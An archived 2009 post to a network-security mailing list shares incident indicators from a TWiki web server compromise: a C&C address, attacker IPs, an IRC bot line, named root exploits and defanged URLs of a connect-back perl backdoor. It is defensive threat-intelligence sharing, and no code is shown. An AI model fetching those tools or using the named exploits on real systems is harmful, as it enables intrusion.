[nsp-sec] compromised unix systems

Gabriel Iovino giovino at ren-isac.net
Sat Aug 29 15:19:47 EDT 2009 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Rolf Gartmann wrote:
> based on an incident report from one of our customers,
> there is a C&C at 69.163.33.101 port 8080 (yes Team Cymru,
> feel free to add it ;) there are some additional systems to check for:
>
> teller-77954-apache!~x333052 at 192.33.115.12 PRIVMSG #prophecy[.exec.]
> 
> 225     | 192.33.115.12    | VIRGINIA-AS - University of Virginia> 
> 
> Timerange of information: 08/20 - 08/21
> 
> possible way of break-in seen so far:
> 
> - exploitation of vulnerable twiki
> - root escalation via wunderbar_emporium
>   (Linux 2.x kernel sock_sendpage() local root exploit)

I want to give everyone a follow up from this data set.

The institution I reached out to was indeed compromised and very
appreciative that this data was passed along. (thank you Rolf!!)

It appears this web server was breached two separate times.

It appears that they were able to exploit vulnerabilities on March 6th
and March 12th. The miscreants were seen on March 6th coming form the IP
<67.202.101.69>.

One of the vulnerabilities was identified as known vulnerability in
TWiki's WebSearch function, the other vulnerability one is unknown. It
could be other unpatched Twiki vulnerability.

The miscreants dropped a perl script <see attached> in TWiki's /bin/
area that gave them another back door to the machine.

I was told there was another back door in /tmp/ and they tried to get
root through a pulseaudio vulnerability.

I have also attached some data found in the apache error log referring to:

> hxxp://darkc0de.com/c0de/perl/conback.txt

Another URL that was seen in the logs was:

> hxxp://ezbake.org/tools/morg.txt

Please feel free to share this information with trusted people but
please leave out the institution that was breached.

If you have any information from an associated compromised twiki
installation, if you could share that with me I would appreciate it.

Part 2 coming in an second email, stay tuned!

Gabe

- --
Gabriel Iovino
Principal Security Engineer, REN-ISAC
http://www.ren-isac.net
24x7 Watch Desk +1(317)278-6630





-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkqZf1MACgkQwqygxIz+pTuqbgCg2g9wPl0AmjuuVsnxvZSV/uEk
4AMAoIdBS8yBroi2RRTx1OK2/8dNpPiu
=CeKk
-----END PGP SIGNATURE-----
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: perl.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090829/d50fb554/attachment-0002.txt>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: apache_error.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090829/d50fb554/attachment-0003.txt>

More information about the nsp-security mailing list